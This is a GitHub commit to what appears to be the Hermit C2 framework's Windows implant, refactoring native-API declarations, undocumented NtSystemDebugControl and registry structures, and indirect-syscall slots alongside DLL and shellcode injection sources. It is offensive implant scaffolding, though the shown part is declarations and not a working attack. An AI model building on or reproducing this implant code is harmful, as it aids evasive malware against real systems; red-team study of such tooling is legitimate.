refactor implant

hideckies · Apr 23, 2024 · 478a311 · 478a311
1 parent fe75120
commit 478a311
Show file tree

Hide file tree

Showing 50 changed files with 1,194 additions and 806 deletions.
diff --git a/payload/win/implant/CMakeLists.txt b/payload/win/implant/CMakeLists.txt
@@ -66,9 +66,9 @@ set(SOURCE_CORE
         src/core/system/group.cpp
         src/core/system/handle.cpp
         src/core/system/http.cpp
-        src/core/system/pipe.cpp
         src/core/system/priv.cpp
         src/core/system/process.cpp
+        src/core/system/registry.cpp
         src/core/system/user.cpp
         src/core/technique/injection/dll_injection.cpp
         src/core/technique/injection/shellcode_injection.cpp
@@ -122,7 +122,7 @@ if(${PAYLOAD_TYPE} STREQUAL \"beacon\")
 endif()
 
 # LINK LIBRATILIES
-link_libraries(bcrypt crypt32 dbghelp gdi32 gdiplus iphlpapi netapi32 ntdll psapi shlwapi winhttp wsock32 ws2_32)
+link_libraries(bcrypt crypt32 dbghelp gdi32 gdiplus iphlpapi netapi32 ntdll psapi winhttp wsock32 ws2_32)
 
 # ADD
 if(${PAYLOAD_FORMAT} STREQUAL "dll")

diff --git a/payload/win/implant/include/core/ntdll.hpp b/payload/win/implant/include/core/ntdll.hpp
@@ -0,0 +1,160 @@
+#ifndef HERMIT_CORE_NTDLL_H
+#define HERMIT_CORE_NTDLL_H
+
+#include <windows.h>
+
+// **For NtSystemDebugControl**
+typedef enum _SYSDBG_COMMAND
+{
+    SysDbgQueryModuleInformation,
+    SysDbgQueryTraceInformation,
+    SysDbgSetTracepoint,
+    SysDbgSetSpecialCall,
+    SysDbgClearSpecialCalls,
+    SysDbgQuerySpecialCalls,
+    SysDbgBreakPoint,
+    SysDbgQueryVersion,
+    SysDbgReadVirtual,
+    SysDbgWriteVirtual,
+    SysDbgReadPhysical,
+    SysDbgWritePhysical,
+    SysDbgReadControlSpace,
+    SysDbgWriteControlSpace,
+    SysDbgReadIoSpace,
+    SysDbgWriteIoSpace,
+    SysDbgReadMsr,
+    SysDbgWriteMsr,
+    SysDbgReadBusData,
+    SysDbgWriteBusData,
+    SysDbgCheckLowMemory,
+    SysDbgEnableKernelDebugger,
+    SysDbgDisableKernelDebugger,
+    SysDbgGetAutoKdEnable,
+    SysDbgSetAutoKdEnable,
+    SysDbgGetPrintBufferSize,
+    SysDbgSetPrintBufferSize,
+    SysDbgGetKdUmExceptionEnable,
+    SysDbgSetKdUmExceptionEnable,
+    SysDbgGetTriageDump,
+    SysDbgGetKdBlockEnable,
+    SysDbgSetKdBlockEnable,
+    SysDbgRegisterForUmBreakInfo,
+    SysDbgGetUmBreakPid,
+    SysDbgClearUmBreakPid,
+    SysDbgGetUmAttachPid,
+    SysDbgClearUmAttachPid,
+    SysDbgGetLiveKernelDump
+} SYSDBG_COMMAND, * PSYSDBG_COMMAND;
+
+typedef union _SYSDBG_LIVEDUMP_CONTROL_FLAGS
+{
+    struct
+    {
+        ULONG UseDumpStorageStack : 1;
+        ULONG CompressMemoryPagesData : 1;
+        ULONG IncludeUserSpaceMemoryPages : 1;
+        ULONG AbortIfMemoryPressure : 1; // REDSTONE4
+        ULONG SelectiveDump : 1; // WIN11
+        ULONG Reserved : 27;
+    };
+    ULONG AsUlong;
+} SYSDBG_LIVEDUMP_CONTROL_FLAGS, *PSYSDBG_LIVEDUMP_CONTROL_FLAGS;
+
+typedef union _SYSDBG_LIVEDUMP_CONTROL_ADDPAGES
+{
+    struct
+    {
+        ULONG HypervisorPages : 1;
+        ULONG NonEssentialHypervisorPages : 1; // since WIN11
+        ULONG Reserved : 30;
+    };
+    ULONG AsUlong;
+} SYSDBG_LIVEDUMP_CONTROL_ADDPAGES, *PSYSDBG_LIVEDUMP_CONTROL_ADDPAGES;
+
+typedef struct _SYSDBG_LIVEDUMP_SELECTIVE_CONTROL
+{
+    ULONG Version;
+    ULONG Size;
+    union
+    {
+        ULONGLONG Flags;
+        struct
+        {
+            ULONGLONG ThreadKernelStacks : 1;
+            ULONGLONG ReservedFlags : 63;
+        };
+    };
+    ULONGLONG Reserved[4];
+} SYSDBG_LIVEDUMP_SELECTIVE_CONTROL, *PSYSDBG_LIVEDUMP_SELECTIVE_CONTROL;
+
+typedef struct _SYSDBG_LIVEDUMP_CONTROL
+{
+    ULONG Version;
+    ULONG BugCheckCode;
+    ULONG_PTR BugCheckParam1;
+    ULONG_PTR BugCheckParam2;
+    ULONG_PTR BugCheckParam3;
+    ULONG_PTR BugCheckParam4;
+    HANDLE DumpFileHandle;
+    HANDLE CancelEventHandle;
+    SYSDBG_LIVEDUMP_CONTROL_FLAGS Flags;
+    SYSDBG_LIVEDUMP_CONTROL_ADDPAGES AddPagesControl;
+    PSYSDBG_LIVEDUMP_SELECTIVE_CONTROL SelectiveControl; // since WIN11
+} SYSDBG_LIVEDUMP_CONTROL, *PSYSDBG_LIVEDUMP_CONTROL;
+
+// **For NtQueryKey**
+typedef enum _KEY_INFORMATION_CLASS
+{
+    KeyBasicInformation,
+    KeyNodeInformation,
+    KeyFullInformation,
+    KeyNameInformation,
+    KeyCachedInformation,
+    KeyFlagsInformation,
+    KeyVirtualizationInformation,
+    KeyHandleTagsInformation,
+    KeyTrustInformation,
+    KeyLayerInformation,
+    MaxKeyInfoClass
+} KEY_INFORMATION_CLASS;
+
+typedef struct _KEY_FULL_INFORMATION
+{
+    LARGE_INTEGER LastWriteTime;
+    ULONG TitleIndex;
+    ULONG ClassOffset;
+    ULONG ClassLength;
+    ULONG SubKeys;
+    ULONG MaxNameLength;
+    ULONG MaxClassLength;
+    ULONG Values;
+    ULONG MaxValueNameLength;
+    ULONG MaxValueDataLength;
+    WCHAR Class[1];
+} KEY_FULL_INFORMATION, *PKEY_FULL_INFORMATION;
+
+// **For NtEnumerateValueKey**
+typedef enum _KEY_VALUE_INFORMATION_CLASS
+{
+    KeyValueBasicInformation,
+    KeyValueFullInformation,
+    KeyValuePartialInformation,
+    KeyValueFullInformationAlign64,
+    KeyValuePartialInformationAlign64,
+    KeyValueLayerInformation,
+    MaxKeyValueInfoClass
+} KEY_VALUE_INFORMATION_CLASS;
+
+typedef struct _KEY_VALUE_FULL_INFORMATION
+{
+    ULONG TitleIndex;
+    ULONG Type;
+    ULONG DataOffset;
+    ULONG DataLength;
+    ULONG NameLength;
+    _Field_size_bytes_(NameLength) WCHAR Name[1];
+    // ...
+    // UCHAR Data[1];
+} KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION;
+
+#endif // HERMIT_CORE_NTDLL_H
diff --git a/payload/win/implant/include/core/procs.hpp b/payload/win/implant/include/core/procs.hpp
@@ -1,6 +1,7 @@
 #ifndef HERMIT_CORE_PROCS_HPP
 #define HERMIT_CORE_PROCS_HPP
 
+#include "core/ntdll.hpp"
 #include "core/stdout.hpp"
 #include "core/syscalls.hpp"
 #include "core/utils.hpp"
@@ -19,6 +20,8 @@ namespace Procs
     typedef NTSTATUS (NTAPI* LPPROC_NTCREATEPROCESS)(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ParentProcess, BOOLEAN InheritObjectTable, HANDLE SectionHandle, HANDLE DebugPort, HANDLE TokenHandle);
     // NtOpenProcess
     typedef NTSTATUS (NTAPI* LPPROC_NTOPENPROCESS)(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
+    // NtOpenProcessToken
+    typedef NTSTATUS (NTAPI* LPPROC_NTOPENPROCESSTOKEN)(HANDLE ProcessHandle, ACCESS_MASK DesiredAccess, PHANDLE TokenHandle);
     // NtTerminateProcess
 	typedef NTSTATUS (NTAPI* LPPROC_NTTERMINATEPROCESS)(HANDLE ProcessHandle, NTSTATUS ExitStatus);
     // NtSetInformationProcess
@@ -41,22 +44,36 @@ namespace Procs
 	typedef NTSTATUS (NTAPI* LPPROC_NTCLOSE)(HANDLE Handle);
     // NtCreateFile
     typedef NTSTATUS (NTAPI* LPPROC_NTCREATEFILE)(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
+    // NtOpenFile
+    typedef NTSTATUS (NTAPI* LPPROC_NTOPENFILE)(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, ULONG ShareAccess, ULONG OpenOptions);
     // NtReadFile
     typedef NTSTATUS (NTAPI* LPPROC_NTREADFILE)(HANDLE FileHandle, HANDLE Event, PIO_APC_ROUTINE ApcRoutine, PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, PVOID Buffer, ULONG Length, PLARGE_INTEGER ByteOffset, PULONG Key);
     // NtWriteFile
     typedef NTSTATUS (NTAPI* LPPROC_NTWRITEFILE)(HANDLE FileHandle, HANDLE Event, PIO_APC_ROUTINE ApcRoutine, PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, PVOID Buffer, ULONG Length, PLARGE_INTEGER ByteOffset, PULONG Key);
+    // NtDeleteFile
+    typedef NTSTATUS (NTAPI* LPPROC_NTDELETEFILE)(POBJECT_ATTRIBUTES ObjectAttributes);
     // NtCreateNamedPipeFile
     typedef NTSTATUS (NTAPI* LPPROC_NTCREATENAMEDPIPEFILE)(PHANDLE FileHandle, ULONG DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, ULONG NamedPipeType, ULONG ReadMode, ULONG CompletionMode, ULONG MaximumInstances, ULONG InboundQuota, ULONG OutboundQuota, PLARGE_INTEGER DefaultTimeout);
     // NtQueryInformationFile
     typedef NTSTATUS (NTAPI* LPPROC_NTQUERYINFORMATIONFILE)(HANDLE FileHandle, PIO_STATUS_BLOCK IoStatusBlock, PVOID FileInformation, ULONG Length, FILE_INFORMATION_CLASS FileInformationClass);
     // NtSetInformationFile
     typedef NTSTATUS (NTAPI* LPPROC_NTSETINFORMATIONFILE)(HANDLE FileHandle, PIO_STATUS_BLOCK IoStatusBlock, PVOID FileInformation, ULONG Length, FILE_INFORMATION_CLASS FileInformationClass);
+    // NtQueryInformationToken
+    typedef NTSTATUS (NTAPI* LPPROC_NTQUERYINFORMATIONTOKEN)(HANDLE HandleToken, TOKEN_INFORMATION_CLASS TokenInformationClass, PVOID TokenInformation, ULONG TokenInformationLength, PULONG ReturnLength);
+    // NtQuerySystemInformation
+    typedef NTSTATUS (NTAPI* LPPROC_NTQUERYSYSTEMINFORMATION)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
+    // NtSystemDebugControl
+    typedef NTSTATUS (NTAPI* LPPROC_NTSYSTEMDEBUGCONTROL)(SYSDBG_COMMAND Command, PVOID InputBuffer, ULONG InputBufferLength, PVOID OutputBuffer, ULONG OutputBufferLength, PULONG ReturnLength);
+    // NtOpenKeyEx
+    typedef NTSTATUS (NTAPI* LPPROC_NTOPENKEYEX)(PHANDLE KeyHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, ULONG OpenOptions);
+    // NtQueryKey
+    typedef NTSTATUS (NTAPI* LPPROC_NTQUERYKEY)(HANDLE KeyHandle, KEY_INFORMATION_CLASS KeyInformationClass, PVOID KeyInformation, ULONG Length, PULONG ResultLength);
+    // NtEnumerateValueKey
+    typedef NTSTATUS (NTAPI* LPPROC_NTENUMERATEVALUEKEY)(HANDLE KeyHandle, ULONG Index, KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, PVOID KeyValueInformation, ULONG Length, PULONG ResultLength);
 
     // **NATIVE APIs (RUNTIME LIBRARY)**
     // RtlAllocateHeap
     typedef PVOID (NTAPI* LPPROC_RTLALLOCATEHEAP)(PVOID HeapHandle, ULONG Flags, SIZE_T Size);
-    // RtlZeroMemory
-    typedef VOID (NTAPI* LPPROC_RTLZEROMEMORY)(PVOID Destination, SIZE_T Length);
     // RtlInitUnicodeString
     typedef NTSTATUS (NTAPI* LPPROC_RTLINITUNICODESTRING)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
     // RtlStringCatW
@@ -69,7 +86,13 @@ namespace Procs
     typedef NTSTATUS (NTAPI* LPPROC_RTLQUERYSYSTEMINFORMATION)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
     // RtlExpandEnvironmentStrings
     typedef NTSTATUS (NTAPI* LPPROC_RTLEXPANDENVIRONMENTSTRINGS)(PVOID Environment, PCWSTR Source, SIZE_T SourceLength, PWSTR Destination, SIZE_T DestinationLength, PSIZE_T ReturnLength);
-
+    // RtlGetCurrentDirectory_U
+    typedef ULONG (NTAPI* LPPROC_RTLGETCURRENTDIRECTORY_U)(ULONG BufferLength, PWSTR Buffer);
+    // RtlSetCurrentDirectory_U
+    typedef NTSTATUS (NTAPI* LPPROC_RTLSETCURRENTDIRECTORY_U)(PUNICODE_STRING PathName);
+    // RtlGetFullPathName_U
+    typedef NTSTATUS (NTAPI* LPPROC_RTLGETFULLPATHNAME_U)(PCWSTR FileName, ULONG BufferLength, PWSTR Buffer, PWSTR *FilePart);
+
     // **WINAPIs**
     // WinHttpOpen
     typedef HINTERNET (WINAPI* LPPROC_WINHTTPOPEN)(LPCWSTR pszAgentW, DWORD dwAccessType, LPCWSTR pszProxyW, LPCWSTR pszProxyBypassW, DWORD dwFlags);
@@ -99,6 +122,7 @@ namespace Procs
         // **NATIVE APIs**
         LPPROC_NTCREATEPROCESS              lpNtCreateProcess                   = nullptr;
         LPPROC_NTOPENPROCESS                lpNtOpenProcess                     = nullptr;
+        LPPROC_NTOPENPROCESSTOKEN           lpNtOpenProcessToken                = nullptr;
         LPPROC_NTTERMINATEPROCESS           lpNtTerminateProcess                = nullptr;
         LPPROC_NTSETINFORMATIONPROCESS      lpNtSetInformationProcess           = nullptr;
         LPPROC_NTCREATETHREADEX             lpNtCreateThreadEx                  = nullptr;
@@ -110,21 +134,31 @@ namespace Procs
         LPPROC_NTWAITFORSINGLEOBJECT        lpNtWaitForSingleObject             = nullptr;
         LPPROC_NTCLOSE                      lpNtClose                           = nullptr;
         LPPROC_NTCREATEFILE                 lpNtCreateFile                      = nullptr;
+        LPPROC_NTOPENFILE                   lpNtOpenFile                        = nullptr;
         LPPROC_NTREADFILE                   lpNtReadFile                        = nullptr;
         LPPROC_NTWRITEFILE                  lpNtWriteFile                       = nullptr;
+        LPPROC_NTDELETEFILE                 lpNtDeleteFile                      = nullptr;
         LPPROC_NTCREATENAMEDPIPEFILE        lpNtCreateNamedPipeFile             = nullptr;
         LPPROC_NTQUERYINFORMATIONFILE       lpNtQueryInformationFile            = nullptr;
+        LPPROC_NTQUERYINFORMATIONTOKEN      lpNtQueryInformationToken           = nullptr;
         LPPROC_NTSETINFORMATIONFILE         lpNtSetInformationFile              = nullptr;
+        LPPROC_NTQUERYSYSTEMINFORMATION     lpNtQuerySystemInformation          = nullptr;
+        LPPROC_NTSYSTEMDEBUGCONTROL         lpNtSystemDebugControl              = nullptr;
+        LPPROC_NTOPENKEYEX                  lpNtOpenKeyEx                       = nullptr;
+        LPPROC_NTQUERYKEY                   lpNtQueryKey                        = nullptr;
+        LPPROC_NTENUMERATEVALUEKEY          lpNtEnumerateValueKey               = nullptr;
 
         // **RUNTIME LIBRARY APIs**
         LPPROC_RTLALLOCATEHEAP              lpRtlAllocateHeap                   = nullptr;
-        LPPROC_RTLZEROMEMORY                lpRtlZeroMemory                     = nullptr;
         LPPROC_RTLINITUNICODESTRING         lpRtlInitUnicodeString              = nullptr;
         LPPROC_RTLSTRINGCCHCATW             lpRtlStringCchCatW                  = nullptr;
         LPPROC_RTLSTRINGCCHCOPYW            lpRtlStringCchCopyW                 = nullptr;
         LPPROC_RTLSTRINGCCHLENGTHW          lpRtlStringCchLengthW               = nullptr;
         LPPROC_RTLQUERYSYSTEMINFORMATION    lpRtlQuerySystemInformation         = nullptr;
         LPPROC_RTLEXPANDENVIRONMENTSTRINGS  lpRtlExpandEnvironmentStrings       = nullptr;
+        LPPROC_RTLGETCURRENTDIRECTORY_U     lpRtlGetCurrentDirectory_U          = nullptr;
+        LPPROC_RTLSETCURRENTDIRECTORY_U     lpRtlSetCurrentDirectory_U          = nullptr;
+        LPPROC_RTLGETFULLPATHNAME_U         lpRtlGetFullPathName_U              = nullptr;
 
         // **WINAPIs**
         LPPROC_WINHTTPOPEN                  lpWinHttpOpen                       = nullptr;
@@ -142,6 +176,7 @@ namespace Procs
         // **SYSCALLS**
         Syscalls::SYSCALL                   sysNtCreateProcess                  = {0};
         Syscalls::SYSCALL                   sysNtOpenProcess                    = {0};
+        Syscalls::SYSCALL                   sysNtOpenProcessToken               = {0};
         Syscalls::SYSCALL                   sysNtTerminateProcess               = {0};
         Syscalls::SYSCALL                   sysNtSetInformationProcess          = {0};
         Syscalls::SYSCALL                   sysNtCreateThreadEx                 = {0};
@@ -152,24 +187,35 @@ namespace Procs
         Syscalls::SYSCALL                   sysNtDuplicateObject                = {0};
         Syscalls::SYSCALL                   sysNtWaitForSingleObject            = {0};
         Syscalls::SYSCALL                   sysNtClose                          = {0};
+        Syscalls::SYSCALL                   sysNtOpenFile                       = {0};
         Syscalls::SYSCALL                   sysNtCreateFile                     = {0};
         Syscalls::SYSCALL                   sysNtReadFile                       = {0};
         Syscalls::SYSCALL                   sysNtWriteFile                      = {0};
+        Syscalls::SYSCALL                   sysNtDeleteFile                     = {0};
         Syscalls::SYSCALL                   sysNtCreateNamedPipeFile            = {0};
         Syscalls::SYSCALL                   sysNtQueryInformationFile           = {0};
         Syscalls::SYSCALL                   sysNtSetInformationFile             = {0};
+        Syscalls::SYSCALL                   sysNtQueryInformationToken          = {0};
+        Syscalls::SYSCALL                   sysNtQuerySystemInformation         = {0};
+        Syscalls::SYSCALL                   sysNtSystemDebugControl             = {0};
+        Syscalls::SYSCALL                   sysNtOpenKeyEx                      = {0};
+        Syscalls::SYSCALL                   sysNtQueryKey                       = {0};
+        Syscalls::SYSCALL                   sysNtEnumerateValueKey              = {0};
+
         Syscalls::SYSCALL                   sysRtlAllocateHeap                  = {0};
-        Syscalls::SYSCALL                   sysRtlZeroMemory                    = {0};
         Syscalls::SYSCALL                   sysRtlInitUnicodeString             = {0};
         Syscalls::SYSCALL                   sysRtlStringCchCatW                 = {0};
         Syscalls::SYSCALL                   sysRtlStringCchCopyW                = {0};
         Syscalls::SYSCALL                   sysRtlStringCchLengthW              = {0};
         Syscalls::SYSCALL                   sysRtlQuerySystemInformation        = {0};
         Syscalls::SYSCALL                   sysRtlExpandEnvironmentStrings      = {0};
+        Syscalls::SYSCALL                   sysRtlGetCurrentDirectory_U         = {0};
+        Syscalls::SYSCALL                   sysRtlSetCurrentDirectory_U         = {0};
+        Syscalls::SYSCALL                   sysRtlGetFullPathName_U             = {0};
     };
     typedef PROCS* PPROCS;
 
     PPROCS FindProcs(HMODULE hNTDLL, HMODULE hWinHTTPDLL, BOOL bIndirectSyscalls);
 }
 
-#endif // HERMIT_CORE_PROCS_HPP
+#endif // HERMIT_CORE_PROCS_HPP
diff --git a/payload/win/implant/include/core/state.hpp b/payload/win/implant/include/core/state.hpp
@@ -26,6 +26,7 @@ namespace State
         PTEB                pTeb;
 
         // Module handlers
+        HMODULE             hKernel32DLL;
         HMODULE             hNTDLL;
         HMODULE             hWinHTTPDLL;